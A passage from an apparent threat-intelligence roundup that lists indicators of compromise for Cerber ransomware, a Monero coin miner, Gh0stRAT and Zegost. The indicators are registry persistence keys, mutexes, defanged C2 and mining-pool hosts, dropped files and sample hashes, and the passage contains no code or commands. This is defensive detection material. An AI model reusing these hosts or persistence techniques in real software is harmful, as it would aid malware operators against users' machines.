Value Name: Äțⶈț㥻䉅〹㉄ⴳ㕃㥆㐭〱ⴴ㔸㡁㐭䐷㝄㙆㑃㜰細
1
<HKLM>\SOFTWARE\CLASSES\m 1
<HKLM>\SOFTWARE\CLASSES\m 1
<HKLM>\SOFTWARE\CLASSES\m
Value Name: ⸠ȂဠȂ
1
<HKLM>\SOFTWARE\CLASSES\C4070}
Value Name: ÄȂⶈȂ㥻䉅〹㉄ⴳ㕃㥆㐭〱ⴴ㔸㡁㐭䐷㝄㙆㑃㜰細
1
<HKLM>\SOFTWARE\CLASSES\`..8-. 1
<HKLM>\SOFTWARE\CLASSES\`..8-. 1
<HKLM>\SOFTWARE\CLASSES\`..8-.
Value Name: ⸀ȯÄȯ
1
<HKLM>\SOFTWARE\CLASSES\2..42AC
Value Name: ࿈ȯླྀȯ⼠ȯ摨dni
1
<HKLM>\SOFTWARE\CLASSES\2{{42AC 1
<HKLM>\SOFTWARE\CLASSES\2{{42AC 1
<HKLM>\SOFTWARE\CLASSES\2{{42AC
Value Name: ླྀɻ࿈ɻླྀɻ摨dni
1
<HKLM>\SOFTWARE\CLASSES\2&&42AC 1
<HKLM>\SOFTWARE\CLASSES\2&&42AC 1
<HKLM>\SOFTWARE\CLASSES\2&&42AC
Value Name: ࿈&ླྀ&⻀&摨dni
1
<HKLM>\SOFTWARE\CLASSES\27742AC 1
<HKLM>\SOFTWARE\CLASSES\27742AC 1
<HKLM>\SOFTWARE\CLASSES\27742AC
Value Name: ླྀȷ࿈ȷླྀȷ摨dni
1
<HKLM>\SOFTWARE\CLASSES\242AC 1
<HKLM>\SOFTWARE\CLASSES\/42AC 1
<HKLM>\SOFTWARE\CLASSES\/42AC 1
MutexesOccurrences
Global\<random guid> 10
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
152[.]32[.]185[.]133 15
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]jwhss[.]com 15
update[.]jwhss[.]com 15
Files and or directories createdOccurrences
%ProgramData%\092742AC-3DAE-42A3-9DCC-9DDD61D18099 25
%ProgramData%\092742AC-3DAE-42A3-9DCC-9DDD61D18099\public.ini 25
%ProgramData%\092742AC-3DAE-42A3-9DCC-9DDD61D18099\msbase\msbase.ini 25
%ProgramData%\092742AC-3DAE-42A3-9DCC-9DDD61D18099\msbase 20

File Hashes

0a358f64825861e90f2e06623a33dbd2a929c120f5f273bf2df33dfb78e21a2f
16c6f46907e88c32d3e3ce8d5a3d0bf3ebbea5bacba8b4917dadd24938ff4173
31ad57c5e88d031109d4eb756184f31f7a0d0950626189635a32b4d2d363a577
34a2de3df00925478e7145f3701d596bf5e2b39e494f413e08d659fe1fc30a62
37d55cdf0d355492cd52c1026bfa79dad962933ca7b87938e9495f3201885020
3b0bcb5a23b22212015f768d882d8e2eae1363640ba6b334c1d60e4d980a3ffa
3bd93b73944dfa0346a2bd28a55a18cfedda951a8a73bc07256f43d78f06a562
3cc4909db9298cab7fea7d9e967e4072a07c96af3061adf8dd77d0251207cd0d
4cc8c97b3541caa7a22ce986e99760f807eb40643f9679734f1476b1676ce29e
5c99b1c74445eb5dbc38644f45176becb22eb8ce9f09dd75300d6854e2c5876a
5da9727cd1118fa2898da3a3fcffc694fbeee0e2914c101542c3a6dc4b898450
6f7ac04a806d23e3e173b04aa95a4f6133d759b435869f9eb97bf8ac12aef4e8
77c4d8cebeb974a495d624164267d96a12424cb16faeb8fe4a5f6b9601dccd7e
7cf4d8009320abddb12467abfd2ae8efabddb6732225572a2a764f0370fc652a
9271fb4d9251cd3dc0e4b7f5a6cc54dd64714885b1cc59f9d1bb7457e4fde5fa
93328f3369752cfe72ad81143c6dd0b9c35928cfe514b96add672e1f2df38114
9c4ae92b55b4b474244afa41c96551a346b5260b8c01d36996bf2338f8348de0
b9f78c45ac9ec67f6c77d8f4bbce0f1b964f4b83556ae7c358107a64891e1a65
bc0986fd1ab84f1fcb96a7fcbce2839fc9d77c9f9475088bb6cc9d8ae92dec39
bc16ad8987ba12f1e684cadc99c1d67ae70b3284d69bb073b8421c73cb0d11e5
bebe431543bb36c257a5194158214d5220c37f15d6652e82948196aa8552f963
c7b4d9ecbbfe3c0f06c55eee849444801b3e8063edbc683ba215af40acccf063
c8e8b83f6686eaf5322739cab4155cfec37605f1a5c3e223abac8a3461acaf21
cab6217f3bd7138825e0408ac537a90bbb656737c480576eede49027c85a1991
d259b68576f223ee1e9a9ebeef58b4953d09c5cf7bc51323d278092ad1ed42b3

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Cerber-9839041-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
MutexesOccurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 17
shell.{<random GUID>} 14
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
149[.]202[.]64[.]0/27 17
149[.]202[.]122[.]0/27 17
149[.]202[.]248[.]0/22 17
172[.]67[.]157[.]138 9
178[.]128[.]255[.]179 8
104[.]21[.]50[.]61 8
104[.]20[.]20[.]251 6
172[.]67[.]2[.]88 6
104[.]20[.]21[.]251 5
104[.]199[.]222[.]174 2
151[.]139[.]128[.]10 2
52[.]2[.]101[.]52 1
104[.]25[.]47[.]99 1
104[.]24[.]96[.]153 1
104[.]24[.]97[.]153 1
104[.]25[.]48[.]99 1
34[.]199[.]22[.]139 1
104[.]26[.]14[.]247 1
104[.]26[.]15[.]247 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]blockcypher[.]com 8
btc[.]blockr[.]io 8
chain[.]so 8
bitaps[.]com 8
p27dokhpz2n7nvgr[.]1j9r76[.]top 4
sochain[.]com 2
w3z5q8a6[.]stackpathcdn[.]com 2
crl[.]comodoca4[.]com 2
crl[.]usertrust[.]com 2
Files and or directories createdOccurrences
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 17
%TEMP%\d19ab989 17
%TEMP%\d19ab989\4710.tmp 17
%TEMP%\d19ab989\a35f.tmp 17
%TEMP%\~PI<random, matching [A-F0-9]{2,4}>.tmp 17
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 17
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.hta 17
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.txt 17
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.jpeg 17
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy) 14
%TEMP%\24e2b309\1719.tmp 12
%TEMP%\24e2b309\4436.tmp 12
%TEMP%\<random, matching [a-z0-9]{8}\[a-f0-9]{4}>.tmp 2

File Hashes

387fccecd60cfd9a3f767983f4b9ca5572762434a7371a119b57bfdd079c88a2
57da8c90d12de206331bddadee6b8bbbdab8648563830b1e553b9ed2baf0dc13
74fc7b703cecd047723d05e8654593f48d1801fa5fbd56b8a6330727da1b73be
81c2c50ef0e6dc05d2c2bb6ae7fc284fcdd30e35a2470f123737113b51a04d83
8f0ff3ff628d68bf92fcfe404fd48c4a73fc37bbb563b888687c46d90612600b
94510d2d24fe42afb50d9d577ac315897fe510f2513ef15e53af70632aa98724
96a2b53b1ddf5c5c54053c7b635d95deacac03ffe22c710d2b0ff2388997bb18
988d69b0cdc4a75aa26a8e058441bca37d5544731aaa41b14600b61e70341b73
9fa01de00a4e35f91029810e347598055a53cf9baeae6716cd088e25652912ee
9fe2b7cc0364ef640854594c02026f78d27af5a94faba8c22e86164668014d48
b02791ac42414f2879a49846bb34632c02cfc3cdd39809e59989913168f64b00
bc299adf8792562681aede4dd15f81db7bf0103c9c965770cb8c3d0159afb2af
bf4876d6a6c55678b3930b2bf2f8a4bf9a98364fc274d649729848190a9375d5
da2ffc90fe2f322410c23093d0823070b7a1edd85f98e5ec2b9e9df66c70d1ba
de7ceb985789e6bac83dc6ce4ddd66716fc646c83cf7a4886a5d35f7fe9c5481
defc4e2359fcd0c26d1293a3d42d4d87cd1a5375f87960dea8d73a783a27c499
f8f52a3aeb4a35b8a047153c7f38c5dce395a1ef2027b6334563f23c5ee4e419

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Win.Packed.CoinMiner-9839148-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 30 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Services.exe
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: oracleservice.exe
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: System32.exe
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: UpdateOneDriveSystem.exe
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: winxm64.exe
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svchost.exe
1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
49[.]12[.]80[.]40 5
49[.]12[.]80[.]38/31 5
54[.]37[.]7[.]208 4
18[.]210[.]126[.]40 3
131[.]153[.]56[.]98 3
5[.]196[.]13[.]29 2
51[.]255[.]34[.]118 2
88[.]198[.]117[.]171 2
159[.]69[.]189[.]115 2
51[.]15[.]69[.]136 1
51[.]15[.]65[.]182 1
51[.]15[.]54[.]102 1
217[.]182[.]169[.]148 1
51[.]15[.]58[.]224 1
5[.]196[.]23[.]240 1
51[.]15[.]78[.]68 1
94[.]130[.]165[.]87 1
51[.]68[.]21[.]188 1
51[.]254[.]84[.]37 1
194[.]5[.]249[.]24 1
51[.]15[.]67[.]17 1
139[.]99[.]101[.]198 1
136[.]243[.]49[.]177 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
xmr[.]pool[.]minergate[.]com 5
pool[.]minexmr[.]com 4
pool[.]bmnr[.]pw 4
xmrpool[.]eu 4
xmr-eu1[.]nanopool[.]org 3
pool[.]hashvault[.]pro 3
gulf[.]moneroocean[.]stream 3
xmr[.]givemexyz[.]in 1
vbbbbbbbbbb 1
xmr-eu2[.]nanopool[.]org 1
xmr-asia1[.]nanopool[.]org 1
Files and or directories createdOccurrences
%APPDATA%\WinCFG 30
%APPDATA%\WinCFG\Libs 30
%APPDATA%\WinCFG\Libs\WR64.sys 30
%TEMP%\Services.exe 13
%APPDATA%\Services.exe 7
%APPDATA%\System32.exe 1
%TEMP%\svchost.exe 1
%HOMEPATH%\Services.exe 1
%HOMEPATH%\oracleservice.exe 1
%TEMP%\UpdateOneDriveSystem.exe 1
%APPDATA%\winxm64.exe 1

File Hashes

021d7bca0c7479d492e314a55c05f52c3fd46ea7c0ccd3d32f0c73a81e17df9c
021e1c1af83b1ebe6438778ef5de19efcdf713b13626b2203873832980cb756e
034fe5292f6aedba0a4fda64a10790b52f47935584474145d69f83e40a5388b0
03ce6a61f2df81fa45f23f551f67eb2a9ae45dbb44ca4faf01aa54e8c41d63ce
041784462bede2a5277237f538f13430809402795d708671d38efaea2d654236
0473e9e41f05aec3b198dc2db3243c98d6cdf285c8d83d070901a1b22918f150
04b1ba4cf86b056fd5aebaef036df151e0a8f84a6eed7849bcf0954a1612040f
05346a8d76081c2848322f245dc87e185264057dfab996f5703b7448e5c6614f
0554e6d7e48cb87fd5652f9f9fa6f7529925adc2fadb2e92e16146e4cfb68685
05ae312c76ed7f9659268d3ce45141790e542471e438e353e1343d8d96d979e6
0737366bfc12e415fd608efc9dab7b3192ff31eeb7c1f588792bf7a0a0e4a566
0761ac268fbd374c20b03bd5a247bf3f165dbea6827d6c5cfb0ef3795ccf4f9d
0b82fd7f81e8674494eb086c3b69bd8b6be555909128daf6be4971ccbca384ab
0c42257a10f9712bb28e19bb56fca863eb0d3cd8f5897918fa50cc2623d5be6e
0da4c6ad4eaefbc5f1dec89670a51845f9280e821174f03ec44e16338cf9fa30
0e85831ef977c03becee71a579e9cc047175f99f5cae8330103d1af7da0f87ca
0e926a4ae5d43585ff1794a7ad122ebd8c006a33319a3bcaf566a473281eb92a
0ee8a267df446db8972b38ed6bd7db8e5b344a8227370b2509b771c076677950
1016a93362ad3cc7eb1c6ea70da90ae277c1c8e0594a99d8d9a0b42e0bb74382
11a6b2e2a223b17b69ccb3f4528e0379e7b04c53e55da9893906bfea42cff578
11d05eb32718b256686cb569ce6e1c6e5fb37ea9ef945fbcc49da7d5c2060a6a
14b074ca980af60a486668ef040118df7ad300fbd4ec4c9d080979d9cdb9583c
159d09a069e6e94d595fc8e6af7b4da8e01c9a5ffec94e7f2e8304fe06bb426c
1860803ffa5c85a3a48fdf063716da7b95b557e21086527dc2c93ae6c693154d
1878c2d53635b5e9ef9f57e279f1698fb23c4de8cece233c2dd6f704c64ef962

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Gh0stRAT-9839666-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 32 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: Description
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: Type
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: Start
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: DisplayName
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: WOW64
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: ObjectName
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: Description
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: FailureActions
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: Type
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: Start
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: DisplayName
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: WOW64
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: ObjectName
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: FailureActions
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: ErrorControl
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: ErrorControl
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX UFO
Value Name: ImagePath
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DIRECTX JRQ
Value Name: ImagePath
5
MutexesOccurrences
<original file dir>\<original file name>.exe 29
DirectX jrq 5
DirectX ufo 5
C:\Windows\micioe.exe 4
127.0.0.1 3
58.218.199.225 2
C:\Windows\xgvzmq.exe 2
C:\Windows\eaayga.exe 2
116.211.144.180 2
C:\Windows\tchhio.exe 2
116.211.144.17 2
103.21.117.143 1
47.95.233.18 1
zhangshuaihua.tl-ip.com 1
114.67.236.148 1
218.2.0.185 1
47.93.52.188 1
111.230.129.192 1
asd5211.f3322.net 1
103.76.87.13 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
103[.]21[.]117[.]143 2
67[.]195[.]204[.]75 2
58[.]218[.]199[.]225 2
116[.]211[.]144[.]180 2
116[.]211[.]144[.]17 2
104[.]47[.]37[.]33 1
117[.]46[.]5[.]71 1
209[.]85[.]233[.]27 1
123[.]249[.]9[.]151 1
67[.]195[.]204[.]77 1
104[.]47[.]56[.]161 1
98[.]136[.]96[.]77 1
104[.]47[.]58[.]33 1
104[.]47[.]18[.]97 1
217[.]172[.]179[.]54 1
130[.]0[.]232[.]208 1
47[.]95[.]233[.]18 1
114[.]67[.]236[.]148 1
218[.]2[.]0[.]185 1
47[.]93[.]52[.]188 1
111[.]230[.]129[.]192 1
103[.]76[.]87[.]13 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
zhangshuaihua[.]tl-ip[.]com 1
asd5211[.]f3322[.]net 1
Files and or directories createdOccurrences
%SystemRoot%\micioe.exe 4
%SystemRoot%\xgvzmq.exe 2
%SystemRoot%\eaayga.exe 2
%SystemRoot%\tchhio.exe 2
%SystemRoot%\zmdpmg.exe 1
%SystemRoot%\iickie.exe 1
%SystemRoot%\lytrym.exe 1
%SystemRoot%\pchjco.exe 1
%SystemRoot%\tgvbgq.exe 1
%SystemRoot%\uusmuk.exe 1
%SystemRoot%\jwzvwy.exe 1
%SystemRoot%\wwmiwy.exe 1
%SystemRoot%\ookyou.exe 1
%SystemRoot%\qqeuqi.exe 1

File Hashes

010877d5ffefd651a6591f043e42c884c772a6caebc4874cd359015e2b742d27
08b333da19cb0a14d6d67de0aaf6cade6191dd01b5aaf08e248192c00f24cd2e
0cfb39f94222726dbf26800c8d8135d8235088ea8ba61df14c483f0a128cba80
0d1d89d4442db7cdc1225da03ed8652ae59752239d2bff976d4490271312caea
1228068d719215b7cad5ec1493521057e150a3850a6e9e9caa93dc406d500c6f
1535b2383a6c2be5adf2682b39ffd0b37c3c5abfacafd575e6895ba8e9faeb34
15ea09e954431f98c0523b5e5f80009110c2836188490e4b83be15c32572c860
1beb18be175e10331aa29066888d0c256afffc8b2dfb53bfb1596b11d5bf7f63
1fec76e020199fb8aea686bbeda5cb851244d0acba405ea2ef887bfe27b7a91e
23eefadaca3164a75bfe16cd4caad20a39a7c7c3a034b4d47c4e0b7913024b7f
2a657b5cfb584ae465b438df429968a2f15f06b70813705f6e2dc7beec0f29d0
34471230c1fda37cce67aa5ae85dfb13310a0065f079eb35d05a410e91c99cde
3c5ab72abf3efd72aa5c4f9528239e9cadd1066f74b53102cbd0e7366c1afded
4149565f66311deef8fae44d164b73ab477ad59e372310ee713cce768fab9a63
45f6d29433ada10f19c88b0461b35285f4478fc73ee49c8ad7189acc0854370d
48153323aedf8b07e8a316dc3602c88caa45158e234eecc391c9ba8f35717768
495a74474932c2a52f1226728f8b8b1c65b565bdd6c823af832a8f9d67dcda15
4a95c949eafaa51b2de503dcf241a12bead970842154b5371e6e0adc3c8f7772
4c353d7100e03c50e79404a249443c4f14f48faa9d4ac2440717ffc7ebbbd09a
50d9fb29eb06f9a965d43e0691e71044b691de7053215691d100793220980b8f
5f3ad39eaba178d39d257da364b1c0096bf8acfe2f9111d3cbd63461ea585ba9
61b4e4297ede515f3c632b5c55a06d7b9c7e5e42dd084a56c2aa385f6cf74efc
74daff7ba7d570971481bd23a433d1d98ba7e61216badad6c895d8f9ab512e96
798fbc4fb65b81b4b94c582718074a82b02f6bee8e6e4f58186a1d923a989863
7ba92ec4b7d80aafde49b343b950ac416efae8d1e8d88759a74e33d9837bf6c1

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Zegost-9840060-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 38 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
34
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
34
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
34
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
34
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
34
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
34
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
32
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: ConsentPromptBehaviorAdmin
32
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: PromptOnSecureDesktop
32
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG 32
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BEEP
Value Name: BEEP
32
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BEEP
Value Name: ErrorService
32
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BEEP
Value Name: svcname
32
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG
Value Name: StoreLocation
32
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ConnectGroup
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WRAKPTIT\PARAMETERS 6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: WRAKPTIT
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WRAKPTIT\PARAMETERS
Value Name: ServiceDll
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DFFUFH34\PARAMETERS 6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: dffUFh34
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DFFUFH34\PARAMETERS
Value Name: ServiceDll
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ALZR9LUL\PARAMETERS 5
MutexesOccurrences
Global\<random guid> 38
Global\KFIStart Menu 32
\x47\x6c\x6f\x62\x61\x6c\x5c\xb850\x1d5 3
DTyREj8NE5dsEjETmOgT7jNpETEZ/m== 2
y6ZTCKtSEjEPDidsEjETmOgT7jNNEQi= 2
86IRDTISDKVTE5cguP/5w5c17ftqETlRDHi= 2
7+<, = x& $ 2
7+<, = x& $ 2
\x47\x6c\x6f\x62\x61\x6c\x5c\xb850\x1c3 2
\x47\x6c\x6f\x62\x61\x6c\x5c\xb850\x1dd 2
86EOCKtsDjVpE5dsEjETmOgT7jNQDKZS/m== 2
Deo17zvMmTIsETE1u-DgCTVRDKkh 2
\x47\x6c\x6f\x62\x61\x6c\x5c\xb850\x1c6 2
x-7Zveo19FY5mTIsETE1u-DgCTVZBHi= 1
yfANCKtpE6tSDjV1EjITESc2yOhqC6lZD/i= 1
wPVpDjysEjZ1EjITESc2yOhqETlRDgi= 1
wTtNCKyZDjZQEidsEjETmOgT7jNSETDh 1
xODP8TATE6E1BKVPDSc2yOhqBKHh 1
86VTDKtODjysmO/1xzopmOcewKNTDKlS/m== 1
86tODK8TDThZEidsEjETmOgT7jNPDjVs/m== 1
8zQ0DTlpE6ZZDTysmO2eveDOmOH2u6NZDKlS/m== 1
wFY5uOsawFg17jlRE5dsEjETmOgT7jNZDKlR/m== 1
EjATDjVpDTZSmTIsETE1u-DgCTVRDKoh 1
DTEOD6yZDTVRmTIsETE1u-DgCT8OD67h 1
\x47\x6c\x6f\x62\x61\x6c\x5c\xb850\x1b9 1

*See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
59[.]42[.]71[.]178 5
157[.]122[.]62[.]205 2
14[.]210[.]109[.]122 2
61[.]146[.]33[.]131 2
183[.]236[.]2[.]18 1
77[.]4[.]7[.]92 1
189[.]163[.]17[.]5 1
54[.]76[.]135[.]1 1
118[.]5[.]49[.]6 1
188[.]5[.]4[.]96 1
20[.]210[.]205[.]20 1
49[.]2[.]123[.]56 1
219[.]132[.]66[.]42 1
219[.]132[.]73[.]67 1
14[.]210[.]91[.]15 1
219[.]132[.]66[.]14 1
183[.]44[.]163[.]231 1
219[.]129[.]65[.]115 1
113[.]103[.]214[.]31 1
14[.]210[.]50[.]189 1
113[.]86[.]242[.]5 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
6603541[.]3322[.]org 2
a306310821[.]gnway[.]net 2
q924413267[.]3322[.]org 2
a254437891[.]3322[.]org 2
5angel[.]3322[.]org 2
wuxianxia[.]3322[.]org 1
z444687973[.]3322[.]org 1
vbvb1212[.]8866[.]org 1
a82045763[.]gnway[.]net 1
a450526783[.]3322[.]org 1
ckm609198663[.]meibu[.]com 1
tianditong001[.]3322[.]org 1
312789691[.]3322[.]org 1
625568680[.]3322[.]org 1
zx976339[.]3322[.]org 1
qq444914178[.]3322[.]org 1
6862082[.]3322[.]org 1
z954985733[.]3322[.]org 1
jinbizi[.]gicp[.]net 1
792143545[.]3322[.]org 1
q362375754[.]3322[.]org 1
qq849181440[.]3322[.]org 1
a846578461[.]gicp[.]net 1
win226[.]8866[.]org 1
wsqadr[.]3322[.]org 1

*See JSON for more IOCs

Files and or directories createdOccurrences
%ProgramFiles(x86)%\MSN 38
%SystemRoot%\SysWOW64\systemwin.log 38
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps 32
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu 32
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini 32
\TEMP\346adqw.not 32
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 15
%TEMP%\~PI<random, matching [A-F0-9]{2,4}>.tmp 10
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.1784.dmp 7
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.1488.dmp 7
%TEMP%\9726.tmp 6
%TEMP%\9550.tmp 6
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.788.dmp 6
%TEMP%\9594.tmp 5
%TEMP%\23136.tmp 5
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.624.dmp 3
%TEMP%\19869.tmp 3
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.1448.dmp 3
%TEMP%\24017.tmp 3
%SystemRoot%\Temp\WER2CE9.tmp.WERInternalMetadata.xml 2
%TEMP%\20671.tmp 2
%TEMP%\16788.tmp 2
%SystemRoot%\Temp\WER54D5.tmp.mdmp 2
%SystemRoot%\Temp\WER3C63.tmp.WERInternalMetadata.xml 2
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\CrashDumps\svchost.exe.732.dmp 2

*See JSON for more IOCs

File Hashes

03cc4584ce6b5ef3c1caa5254ed9f662d72f2a26b914bf5ab160cd8280a25372
0bcd4226599883ea6283639113d14c0e79621fdfe22960223455b23a3094ca73
128853e8e4147ca1ef23c9b5380ec3172ca7ef2fe7ffd52265f67493b9bc7ae1
19963bd91b78dedfea48c047c49d183f60051658cd2dd83dea71d6d27e460fbf
1a8d0c08a5b21a055a1c079d519c8fdde02fb3c54b83e6db6a8feda609db5e3b
1c073209548a1d9641716146e8adce42a8e0d37b5299fcb202c9db673692a298
1c63bdb2c087cff98e830d6b3899d31646b08141efbf959696c4c6e9e11aa87c
1d6e33bb6656f3df09b8a6dd89979ad6ed9df66a11fb535f3d66bdc11266ecb6
240952179a00e8570d2150a47f9fb73d1b16f7d6922d7969c51cb36d7a124c5a
2d305d69bca1acee9ad0f8722d0253f652ab18d294a91ec27ac95d1e1b05319e
3b19eec70b4da7a9ca73045151fce2393366a086812053cde3f6d9a0e41974e7
3c22cbfa8eb07efc1f04d9950efdd1aef6cc98b55b906a08919c272b9699a358
3cd992d19da307af7c77b9c61a32dd9d6be7ac38863b31ff883f3286a18ee1ed
3d951511935e779a5107f673e68a960f3b023bfe169042405811e7ee2b58adfe
4493d8d4dd2c5d8d749e56543d2714e94c7966ae0650a046478050fde23a4ad8
44b548ca549e2718eef624b13fd64880a23b596912d9fd90d5e61eb7f507b772
4730db6a58c0398a3a2fd747d8f112474771f60cc4bd91f01b39ec03826a85e4
4956959d335a58a3a2c1e29ee783800c14e0ee5dca260ec8b41d86c9845e3543
